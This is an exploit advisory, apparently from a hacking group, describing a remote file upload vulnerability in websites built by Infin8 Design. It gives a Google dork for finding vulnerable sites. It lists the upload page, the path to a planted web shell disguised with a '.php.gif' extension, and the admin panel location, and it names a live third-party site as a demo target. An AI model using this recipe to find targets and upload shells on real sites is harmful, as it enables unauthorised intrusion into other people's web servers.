Sites designed by Infin8 suffer from a remote shell upload vulnerability. Note that this finding houses site-specific data.
586c78ad4fabbf086d403c8eef84b12fdc9608bf23a4f73603525e9f9fcc3a97
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Infin8 <== Remote File Upload Vulnerability
-------------------------------------------------------------------------------------------
[~] Title : [ Infin8 <== Remote File Upload Vulnerability ]
[~] Auth0r : [ Hack Center Security Team ]
[~] Discovered By : [ Net.W0lf ]
[~] Software Link : [ www.infin8design.com ]
[~] Impact : [ High ]
[~] E-Mail : [ Bl4ck.Intell@gmail.com & Net-w0lf@att.net ]
[~] Google Dork : [ inurl:"/design-your-own-stamp.php" ]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+-----------------------+
| Remote File Upload |
+-----------------------+
-----[ Exploit/p0c ]-----
[~] Upload Access : 127.0.0.1/[patch]/design-your-own-stamp.php
[~] Shell Access : 127.0.0.1/images/uploads/upload_5612/w0lf.php.gif
[~] Admin Panel : 127.0.0.1/admin/
-----[ D3m0 ]-----
[~] www.craftstampsonline.co.uk/design-your-own-stamp.php
[~] Greetz : | Am!r | B3HZ4D | Packetstormsecurity.org | Exploit-db.com | All Iranian PenTesTerZ
[~] You Can See Us In The Dark
----------------------------------------------------------------------------------------------------